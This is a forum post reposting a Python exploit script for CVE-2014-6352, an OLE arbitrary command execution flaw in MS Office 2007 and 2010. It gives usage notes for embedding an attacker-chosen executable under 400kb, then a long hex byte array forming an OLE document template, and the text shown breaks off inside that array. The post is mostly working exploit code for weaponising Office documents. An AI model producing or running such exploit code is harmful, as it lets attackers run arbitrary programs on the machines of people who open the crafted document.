Jump to content

Nytro

Administrators
  • Posts

    18737
  • Joined

  • Last visited

  • Days Won

    711

Everything posted by Nytro

  1. [h=1]MS Office 2007 and 2010 - OLE Arbitrary Command Execution[/h] # # Full exploit: http://www.exploit-db.com/sploits/35216.rar # #CVE-2014-6352 OLE Remote Code Execution #Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com #Advanced Hacking Trainings - http://training.aslitsecurity.com #Web - http://www.aslitsecurity.com/ #Blog - http://www.aslitsecurity.blogspot.com/ #Tested on win7 - office 2007 and 2010. The exploit will not give UAC warning the user account is administrator. Else there will be a UAC warning. #No .inf file is required in this exploit #The size of executable payload should be less than 400kb #python 2.7 required #The folder "temp" should be in same dir as this python file. # usage - python.exe CVE-2014-6352.py (name of exe) #!/usr/bin/python import os import sys import shutil oleole = ( "\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3E\x00\x03\x00\xFE\xFF\x09\x00\x06\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\xFE\xFF\xFF\xFF\x00\x00\x00\x00" "\xFE\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00" "\x00\x00\x08\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFD\xFF\xFF\xFF\xFE\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF" "\xFD\xFF\xFF\xFF\x0A\x00\x00\x00\x0B\x00\x00\x00\x0C\x00\x00\x00\x0D\x00\x00\x00\x0E\x00\x00\x00\x0F\x00\x00\x00\x10\x00\x00\x00\x11\x00" "\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00\x19\x00\x00\x00" "\x1A\x00\x00\x00\x1B\x00\x00\x00\x1C\x00\x00\x00\x1D\x00\x00\x00\x1E\x00\x00\x00\x1F\x00\x00\x00\x20\x00\x00\x00\x21\x00\x00\x00\x22\x00" "\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\x28\x00\x00\x00\x29\x00\x00\x00\x2A\x00\x00\x00" "\x2B\x00\x00\x00\x2C\x00\x00\x00\x2D\x00\x00\x00\x2E\x00\x00\x00\x2F\x00\x00\x00\x30\x00\x00\x00\x31\x00\x00\x00\x32\x00\x00\x00\x33\x00" "\x00\x00\x34\x00\x00\x00\x35\x00\x00\x00\x36\x00\x00\x00\x37\x00\x00\x00\x38\x00\x00\x00\x39\x00\x00\x00\x3A\x00\x00\x00\x3B\x00\x00\x00" "\x3C\x00\x00\x00\x3D\x00\x00\x00\x3E\x00\x00\x00\x3F\x00\x00\x00\x40\x00\x00\x00\x41\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x44\x00" "\x00\x00\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x48\x00\x00\x00\x49\x00\x00\x00\x4A\x00\x00\x00\x4B\x00\x00\x00\x4C\x00\x00\x00" "\x4D\x00\x00\x00\x4E\x00\x00\x00\x4F\x00\x00\x00\x50\x00\x00\x00\x51\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00\x54\x00\x00\x00\x55\x00" "\x00\x00\x56\x00\x00\x00\x57\x00\x00\x00\x58\x00\x00\x00\x59\x00\x00\x00\x5A\x00\x00\x00\x5B\x00\x00\x00\x5C\x00\x00\x00\x5D\x00\x00\x00" "\x5E\x00\x00\x00\x5F\x00\x00\x00\x60\x00\x00\x00\x61\x00\x00\x00\x62\x00\x00\x00\x63\x00\x00\x00\x64\x00\x00\x00\x65\x00\x00\x00\x66\x00" "\x00\x00\x67\x00\x00\x00\x68\x00\x00\x00\x69\x00\x00\x00\x6A\x00\x00\x00\x6B\x00\x00\x00\x6C\x00\x00\x00\x6D\x00\x00\x00\x6E\x00\x00\x00" "\x6F\x00\x00\x00\x70\x00\x00\x00\x71\x00\x00\x00\x72\x00\x00\x00\x73\x00\x00\x00\x74\x00\x00\x00\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00" "\x00\x00\x78\x00\x00\x00\x79\x00\x00\x00\x7A\x00\x00\x00\x7B\x00\x00\x00\x7C\x00\x00\x00\x7D\x00\x00\x00\x7E\x00\x00\x00\x7F\x00\x00\x00" "\x80\x00\x00\x00\x52\x00\x6F\x00\x6F\x00\x74\x00\x20\x00\x45\x00\x6E\x00\x74\x00\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x16\x00\x05\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x01\x00\x00\x00\x0C\x00\x03\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD0\x8D\xED\x42\xD9\xF8\xCF\x01\xFE\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x4F\x00" "\x6C\x00\x65\x00\x31\x00\x30\x00\x4E\x00\x61\x00\x74\x00\x69\x00\x76\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1A\x00\x02\x01\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x1D\x91\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x81\x00\x00\x00\x82\x00\x00\x00\x83\x00\x00\x00\x84\x00\x00\x00\x85\x00\x00\x00\x86\x00\x00\x00\x87\x00\x00\x00" "\x88\x00\x00\x00\x89\x00\x00\x00\x8A\x00\x00\x00\x8B\x00\x00\x00\x8C\x00\x00\x00\x8D\x00\x00\x00\x8E\x00\x00\x00\x8F\x00\x00\x00\x90\x00" "\x00\x00\x91\x00\x00\x00\x92\x00\x00\x00\x93\x00\x00\x00\x94\x00\x00\x00\x95\x00\x00\x00\x96\x00\x00\x00\x97\x00\x00\x00\x98\x00\x00\x00" "\x99\x00\x00\x00\x9A\x00\x00\x00\x9B\x00\x00\x00\x9C\x00\x00\x00\x9D\x00\x00\x00\x9E\x00\x00\x00\x9F\x00\x00\x00\xA0\x00\x00\x00\xA1\x00" "\x00\x00\xA2\x00\x00\x00\xA3\x00\x00\x00\xA4\x00\x00\x00\xA5\x00\x00\x00\xA6\x00\x00\x00\xA7\x00\x00\x00\xA8\x00\x00\x00\xA9\x00\x00\x00" "\xAA\x00\x00\x00\xAB\x00\x00\x00\xAC\x00\x00\x00\xAD\x00\x00\x00\xAE\x00\x00\x00\xAF\x00\x00\x00\xB0\x00\x00\x00\xB1\x00\x00\x00\xB2\x00" "\x00\x00\xB3\x00\x00\x00\xB4\x00\x00\x00\xB5\x00\x00\x00\xB6\x00\x00\x00\xB7\x00\x00\x00\xB8\x00\x00\x00\xB9\x00\x00\x00\xBA\x00\x00\x00" "\xBB\x00\x00\x00\xBC\x00\x00\x00\xBD\x00\x00\x00\xBE\x00\x00\x00\xBF\x00\x00\x00\xC0\x00\x00\x00\xC1\x00\x00\x00\xC2\x00\x00\x00\xC3\x00" "\x00\x00\xC4\x00\x00\x00\xC5\x00\x00\x00\xC6\x00\x00\x00\xC7\x00\x00\x00\xC8\x00\x00\x00\xC9\x00\x00\x00\xCA\x00\x00\x00\xCB\x00\x00\x00" "\xCC\x00\x00\x00\xCD\x00\x00\x00\xCE\x00\x00\x00\xCF\x00\x00\x00\xD0\x00\x00\x00\xD1\x00\x00\x00\xD2\x00\x00\x00\xD3\x00\x00\x00\xD4\x00" "\x00\x00\xD5\x00\x00\x00\xD6\x00\x00\x00\xD7\x00\x00\x00\xD8\x00\x00\x00\xD9\x00\x00\x00\xDA\x00\x00\x00\xDB\x00\x00\x00\xDC\x00\x00\x00" "\xDD\x00\x00\x00\xDE\x00\x00\x00\xDF\x00\x00\x00\xE0\x00\x00\x00\xE1\x00\x00\x00\xE2\x00\x00\x00\xE3\x00\x00\x00\xE4\x00\x00\x00\xE5\x00" "\x00\x00\xE6\x00\x00\x00\xE7\x00\x00\x00\xE8\x00\x00\x00\xE9\x00\x00\x00\xEA\x00\x00\x00\xEB\x00\x00\x00\xEC\x00\x00\x00\xED\x00\x00\x00" "\xEE\x00\x00\x00\xEF\x00\x00\x00\xF0\x00\x00\x00\xF1\x00\x00\x00\xF2\x00\x00\x00\xF3\x00\x00\x00\xF4\x00\x00\x00\xF5\x00\x00\x00\xF6\x00" "\x00\x00\xF7\x00\x00\x00\xF8\x00\x00\x00\xF9\x00\x00\x00\xFA\x00\x00\x00\xFB\x00\x00\x00\xFC\x00\x00\x00\xFD\x00\x00\x00\xFE\x00\x00\x00" "\xFF\x00\x00\x00\x00\x01\x00\x00\x01\x01\x00\x00\x02\x01\x00\x00\x03\x01\x00\x00\x04\x01\x00\x00\x05\x01\x00\x00\x06\x01\x00\x00\x07\x01" "\x00\x00\x08\x01\x00\x00\x09\x01\x00\x00\x0A\x01\x00\x00\x0B\x01\x00\x00\x0C\x01\x00\x00\x0D\x01\x00\x00\x0E\x01\x00\x00\x0F\x01\x00\x00" "\x10\x01\x00\x00\x11\x01\x00\x00\x12\x01\x00\x00\x13\x01\x00\x00\x14\x01\x00\x00\x15\x01\x00\x00\x16\x01\x00\x00\x17\x01\x00\x00\x18\x01" "\x00\x00\x19\x01\x00\x00\x1A\x01\x00\x00\x1B\x01\x00\x00\x1C\x01\x00\x00\x1D\x01\x00\x00\x1E\x01\x00\x00\x1F\x01\x00\x00\x20\x01\x00\x00" "\x21\x01\x00\x00\x22\x01\x00\x00\x23\x01\x00\x00\x24\x01\x00\x00\x25\x01\x00\x00\x26\x01\x00\x00\x27\x01\x00\x00\x28\x01\x00\x00\x29\x01" "\x00\x00\x2A\x01\x00\x00\x2B\x01\x00\x00\x2C\x01\x00\x00\x2D\x01\x00\x00\x2E\x01\x00\x00\x2F\x01\x00\x00\x30\x01\x00\x00\x31\x01\x00\x00" "\x32\x01\x00\x00\x33\x01\x00\x00\x34\x01\x00\x00\x35\x01\x00\x00\x36\x01\x00\x00\x37\x01\x00\x00\x38\x01\x00\x00\x39\x01\x00\x00\x3A\x01" "\x00\x00\x3B\x01\x00\x00\x3C\x01\x00\x00\x3D\x01\x00\x00\x3E\x01\x00\x00\x3F\x01\x00\x00\x40\x01\x00\x00\x41\x01\x00\x00\x42\x01\x00\x00" "\x43\x01\x00\x00\x44\x01\x00\x00\x45\x01\x00\x00\x46\x01\x00\x00\x47\x01\x00\x00\x48\x01\x00\x00\x49\x01\x00\x00\x4A\x01\x00\x00\x4B\x01" "\x00\x00\x4C\x01\x00\x00\x4D\x01\x00\x00\x4E\x01\x00\x00\x4F\x01\x00\x00\x50\x01\x00\x00\x51\x01\x00\x00\x52\x01\x00\x00\x53\x01\x00\x00" "\x54\x01\x00\x00\x55\x01\x00\x00\x56\x01\x00\x00\x57\x01\x00\x00\x58\x01\x00\x00\x59\x01\x00\x00\x5A\x01\x00\x00\x5B\x01\x00\x00\x5C\x01" "\x00\x00\x5D\x01\x00\x00\x5E\x01\x00\x00\x5F\x01\x00\x00\x60\x01\x00\x00\x61\x01\x00\x00\x62\x01\x00\x00\x63\x01\x00\x00\x64\x01\x00\x00" "\x65\x01\x00\x00\x66\x01\x00\x00\x67\x01\x00\x00\x68\x01\x00\x00\x69\x01\x00\x00\x6A\x01\x00\x00\x6B\x01\x00\x00\x6C\x01\x00\x00\x6D\x01" "\x00\x00\x6E\x01\x00\x00\x6F\x01\x00\x00\x70\x01\x00\x00\x71\x01\x00\x00\x72\x01\x00\x00\x73\x01\x00\x00\x74\x01\x00\x00\x75\x01\x00\x00" "\x76\x01\x00\x00\x77\x01\x00\x00\x78\x01\x00\x00\x79\x01\x00\x00\x7A\x01\x00\x00\x7B\x01\x00\x00\x7C\x01\x00\x00\x7D\x01\x00\x00\x7E\x01" "\x00\x00\x7F\x01\x00\x00\x80\x01\x00\x00\x81\x01\x00\x00\x82\x01\x00\x00\x83\x01\x00\x00\x84\x01\x00\x00\x85\x01\x00\x00\x86\x01\x00\x00" "\x87\x01\x00\x00\x88\x01\x00\x00\x89\x01\x00\x00\x8A\x01\x00\x00\x8B\x01\x00\x00\x8C\x01\x00\x00\x8D\x01\x00\x00\x8E\x01\x00\x00\x8F\x01" "\x00\x00\x90\x01\x00\x00\x91\x01\x00\x00\x92\x01\x00\x00\x93\x01\x00\x00\x94\x01\x00\x00\x95\x01\x00\x00\x96\x01\x00\x00\x97\x01\x00\x00" "\x98\x01\x00\x00\x99\x01\x00\x00\x9A\x01\x00\x00\x9B\x01\x00\x00\x9C\x01\x00\x00\x9D\x01\x00\x00\x9E\x01\x00\x00\x9F\x01\x00\x00\xA0\x01" "\x00\x00\xA1\x01\x00\x00\xA2\x01\x00\x00\xA3\x01\x00\x00\xA4\x01\x00\x00\xA5\x01\x00\x00\xA6\x01\x00\x00\xA7\x01\x00\x00\xA8\x01\x00\x00" "\xA9\x01\x00\x00\xAA\x01\x00\x00\xAB\x01\x00\x00\xAC\x01\x00\x00\xAD\x01\x00\x00\xAE\x01\x00\x00\xAF\x01\x00\x00\xB0\x01\x00\x00\xB1\x01" "\x00\x00\xB2\x01\x00\x00\xB3\x01\x00\x00\xB4\x01\x00\x00\xB5\x01\x00\x00\xB6\x01\x00\x00\xB7\x01\x00\x00\xB8\x01\x00\x00\xB9\x01\x00\x00" "\xBA\x01\x00\x00\xBB\x01\x00\x00\xBC\x01\x00\x00\xBD\x01\x00\x00\xBE\x01\x00\x00\xBF\x01\x00\x00\xC0\x01\x00\x00\xC1\x01\x00\x00\xC2\x01" "\x00\x00\xC3\x01\x00\x00\xC4\x01\x00\x00\xC5\x01\x00\x00\xC6\x01\x00\x00\xC7\x01\x00\x00\xC8\x01\x00\x00\xC9\x01\x00\x00\xCA\x01\x00\x00" "\xCB\x01\x00\x00\xCC\x01\x00\x00\xCD\x01\x00\x00\xCE\x01\x00\x00\xCF\x01\x00\x00\xD0\x01\x00\x00\xD1\x01\x00\x00\xD2\x01\x00\x00\xD3\x01" "\x00\x00\xD4\x01\x00\x00\xD5\x01\x00\x00\xD6\x01\x00\x00\xD7\x01\x00\x00\xD8\x01\x00\x00\xD9\x01\x00\x00\xDA\x01\x00\x00\xDB\x01\x00\x00" "\xDC\x01\x00\x00\xDD\x01\x00\x00\xDE\x01\x00\x00\xDF\x01\x00\x00\xE0\x01\x00\x00\xE1\x01\x00\x00\xE2\x01\x00\x00\xE3\x01\x00\x00\xE4\x01" "\x00\x00\xE5\x01\x00\x00\xE6\x01\x00\x00\xE7\x01\x00\x00\xE8\x01\x00\x00\xE9\x01\x00\x00\xEA\x01\x00\x00\xEB\x01\x00\x00\xEC\x01\x00\x00" "\xED\x01\x00\x00\xEE\x01\x00\x00\xEF\x01\x00\x00\xF0\x01\x00\x00\xF1\x01\x00\x00\xF2\x01\x00\x00\xF3\x01\x00\x00\xF4\x01\x00\x00\xF5\x01" "\x00\x00\xF6\x01\x00\x00\xF7\x01\x00\x00\xF8\x01\x00\x00\xF9\x01\x00\x00\xFA\x01\x00\x00\xFB\x01\x00\x00\xFC\x01\x00\x00\xFD\x01\x00\x00" "\xFE\x01\x00\x00\xFF\x01\x00\x00\x00\x02\x00\x00\x01\x02\x00\x00\x02\x02\x00\x00\x03\x02\x00\x00\x04\x02\x00\x00\x05\x02\x00\x00\x06\x02" "\x00\x00\x07\x02\x00\x00\x08\x02\x00\x00\x09\x02\x00\x00\x0A\x02\x00\x00\x0B\x02\x00\x00\x0C\x02\x00\x00\x0D\x02\x00\x00\x0E\x02\x00\x00" "\x0F\x02\x00\x00\x10\x02\x00\x00\x11\x02\x00\x00\x12\x02\x00\x00\x13\x02\x00\x00\x14\x02\x00\x00\x15\x02\x00\x00\x16\x02\x00\x00\x17\x02" "\x00\x00\x18\x02\x00\x00\x19\x02\x00\x00\x1A\x02\x00\x00\x1B\x02\x00\x00\x1C\x02\x00\x00\x1D\x02\x00\x00\x1E\x02\x00\x00\x1F\x02\x00\x00" "\x20\x02\x00\x00\x21\x02\x00\x00\x22\x02\x00\x00\x23\x02\x00\x00\x24\x02\x00\x00\x25\x02\x00\x00\x26\x02\x00\x00\x27\x02\x00\x00\x28\x02" "\x00\x00\x29\x02\x00\x00\x2A\x02\x00\x00\x2B\x02\x00\x00\x2C\x02\x00\x00\x2D\x02\x00\x00\x2E\x02\x00\x00\x2F\x02\x00\x00\x30\x02\x00\x00" "\x31\x02\x00\x00\x32\x02\x00\x00\x33\x02\x00\x00\x34\x02\x00\x00\x35\x02\x00\x00\x36\x02\x00\x00\x37\x02\x00\x00\x38\x02\x00\x00\x39\x02" "\x00\x00\x3A\x02\x00\x00\x3B\x02\x00\x00\x3C\x02\x00\x00\x3D\x02\x00\x00\x3E\x02\x00\x00\x3F\x02\x00\x00\x40\x02\x00\x00\x41\x02\x00\x00" "\x42\x02\x00\x00\x43\x02\x00\x00\x44\x02\x00\x00\x45\x02\x00\x00\x46\x02\x00\x00\x47\x02\x00\x00\x48\x02\x00\x00\x49\x02\x00\x00\x4A\x02" "\x00\x00\x4B\x02\x00\x00\x4C\x02\x00\x00\x4D\x02\x00\x00\x4E\x02\x00\x00\x4F\x02\x00\x00\x50\x02\x00\x00\x51\x02\x00\x00\x52\x02\x00\x00" "\x53\x02\x00\x00\x54\x02\x00\x00\x55\x02\x00\x00\x56\x02\x00\x00\x57\x02\x00\x00\x58\x02\x00\x00\x59\x02\x00\x00\x5A\x02\x00\x00\x5B\x02" "\x00\x00\x5C\x02\x00\x00\x5D\x02\x00\x00\x5E\x02\x00\x00\x5F\x02\x00\x00\x60\x02\x00\x00\x61\x02\x00\x00\x62\x02\x00\x00\x63\x02\x00\x00" "\x64\x02\x00\x00\x65\x02\x00\x00\x66\x02\x00\x00\x67\x02\x00\x00\x68\x02\x00\x00\x69\x02\x00\x00\x6A\x02\x00\x00\x6B\x02\x00\x00\x6C\x02" "\x00\x00\x6D\x02\x00\x00\x6E\x02\x00\x00\x6F\x02\x00\x00\x70\x02\x00\x00\x71\x02\x00\x00\x72\x02\x00\x00\x73\x02\x00\x00\x74\x02\x00\x00" "\x75\x02\x00\x00\x76\x02\x00\x00\x77\x02\x00\x00\x78\x02\x00\x00\x79\x02\x00\x00\x7A\x02\x00\x00\x7B\x02\x00\x00\x7C\x02\x00\x00\x7D\x02" "\x00\x00\x7E\x02\x00\x00\x7F\x02\x00\x00\x80\x02\x00\x00\x81\x02\x00\x00\x82\x02\x00\x00\x83\x02\x00\x00\x84\x02\x00\x00\x85\x02\x00\x00" "\x86\x02\x00\x00\x87\x02\x00\x00\x88\x02\x00\x00\x89\x02\x00\x00\x8A\x02\x00\x00\x8B\x02\x00\x00\x8C\x02\x00\x00\x8D\x02\x00\x00\x8E\x02" "\x00\x00\x8F\x02\x00\x00\x90\x02\x00\x00\x91\x02\x00\x00\x92\x02\x00\x00\x93\x02\x00\x00\x94\x02\x00\x00\x95\x02\x00\x00\x96\x02\x00\x00" "\x97\x02\x00\x00\x98\x02\x00\x00\x99\x02\x00\x00\x9A\x02\x00\x00\x9B\x02\x00\x00\x9C\x02\x00\x00\x9D\x02\x00\x00\x9E\x02\x00\x00\x9F\x02" "\x00\x00\xA0\x02\x00\x00\xA1\x02\x00\x00\xA2\x02\x00\x00\xA3\x02\x00\x00\xA4\x02\x00\x00\xA5\x02\x00\x00\xA6\x02\x00\x00\xA7\x02\x00\x00" "\xA8\x02\x00\x00\xA9\x02\x00\x00\xAA\x02\x00\x00\xAB\x02\x00\x00\xAC\x02\x00\x00\xAD\x02\x00\x00\xAE\x02\x00\x00\xAF\x02\x00\x00\xB0\x02" "\x00\x00\xB1\x02\x00\x00\xB2\x02\x00\x00\xB3\x02\x00\x00\xB4\x02\x00\x00\xB5\x02\x00\x00\xB6\x02\x00\x00\xB7\x02\x00\x00\xB8\x02\x00\x00" "\xB9\x02\x00\x00\xBA\x02\x00\x00\xBB\x02\x00\x00\xBC\x02\x00\x00\xBD\x02\x00\x00\xBE\x02\x00\x00\xBF\x02\x00\x00\xC0\x02\x00\x00\xC1\x02" "\x00\x00\xC2\x02\x00\x00\xC3\x02\x00\x00\xC4\x02\x00\x00\xC5\x02\x00\x00\xC6\x02\x00\x00\xC7\x02\x00\x00\xC8\x02\x00\x00\xC9\x02\x00\x00" "\xCA\x02\x00\x00\xCB\x02\x00\x00\xCC\x02\x00\x00\xCD\x02\x00\x00\xCE\x02\x00\x00\xCF\x02\x00\x00\xD0\x02\x00\x00\xD1\x02\x00\x00\xD2\x02" "\x00\x00\xD3\x02\x00\x00\xD4\x02\x00\x00\xD5\x02\x00\x00\xD6\x02\x00\x00\xD7\x02\x00\x00\xD8\x02\x00\x00\xD9\x02\x00\x00\xDA\x02\x00\x00" "\xDB\x02\x00\x00\xDC\x02\x00\x00\xDD\x02\x00\x00\xDE\x02\x00\x00\xDF\x02\x00\x00\xE0\x02\x00\x00\xE1\x02\x00\x00\xE2\x02\x00\x00\xE3\x02" "\x00\x00\xE4\x02\x00\x00\xE5\x02\x00\x00\xE6\x02\x00\x00\xE7\x02\x00\x00\xE8\x02\x00\x00\xE9\x02\x00\x00\xEA\x02\x00\x00\xEB\x02\x00\x00" "\xEC\x02\x00\x00\xED\x02\x00\x00\xEE\x02\x00\x00\xEF\x02\x00\x00\xF0\x02\x00\x00\xF1\x02\x00\x00\xF2\x02\x00\x00\xF3\x02\x00\x00\xF4\x02" "\x00\x00\xF5\x02\x00\x00\xF6\x02\x00\x00\xF7\x02\x00\x00\xF8\x02\x00\x00\xF9\x02\x00\x00\xFA\x02\x00\x00\xFB\x02\x00\x00\xFC\x02\x00\x00" "\xFD\x02\x00\x00\xFE\x02\x00\x00\xFF\x02\x00\x00\x00\x03\x00\x00\x01\x03\x00\x00\x02\x03\x00\x00\x03\x03\x00\x00\x04\x03\x00\x00\x05\x03" "\x00\x00\x06\x03\x00\x00\x07\x03\x00\x00\x08\x03\x00\x00\x09\x03\x00\x00\x0A\x03\x00\x00\x0B\x03\x00\x00\x0C\x03\x00\x00\x0D\x03\x00\x00" "\x0E\x03\x00\x00\x0F\x03\x00\x00\x10\x03\x00\x00\x11\x03\x00\x00\x12\x03\x00\x00\x13\x03\x00\x00\x14\x03\x00\x00\x15\x03\x00\x00\x16\x03" "\x00\x00\x17\x03\x00\x00\x18\x03\x00\x00\x19\x03\x00\x00\x1A\x03\x00\x00\x1B\x03\x00\x00\x1C\x03\x00\x00\x1D\x03\x00\x00\x1E\x03\x00\x00" "\x1F\x03\x00\x00\x20\x03\x00\x00\x21\x03\x00\x00\x22\x03\x00\x00\x23\x03\x00\x00\x24\x03\x00\x00\x25\x03\x00\x00\x26\x03\x00\x00\x27\x03" "\x00\x00\x28\x03\x00\x00\x29\x03\x00\x00\x2A\x03\x00\x00\x2B\x03\x00\x00\x2C\x03\x00\x00\x2D\x03\x00\x00\x2E\x03\x00\x00\x2F\x03\x00\x00" "\x30\x03\x00\x00\x31\x03\x00\x00\x32\x03\x00\x00\x33\x03\x00\x00\x34\x03\x00\x00\x35\x03\x00\x00\x36\x03\x00\x00\x37\x03\x00\x00\x38\x03" "\x00\x00\x39\x03\x00\x00\x3A\x03\x00\x00\x3B\x03\x00\x00\x3C\x03\x00\x00\x3D\x03\x00\x00\x3E\x03\x00\x00\x3F\x03\x00\x00\x40\x03\x00\x00" "\x41\x03\x00\x00\x42\x03\x00\x00\x43\x03\x00\x00\x44\x03\x00\x00\x45\x03\x00\x00\x46\x03\x00\x00\x47\x03\x00\x00\x48\x03\x00\x00\x49\x03" "\x00\x00\x4A\x03\x00\x00\x4B\x03\x00\x00\x4C\x03\x00\x00\x4D\x03\x00\x00\x4E\x03\x00\x00\x4F\x03\x00\x00\x50\x03\x00\x00\x51\x03\x00\x00" 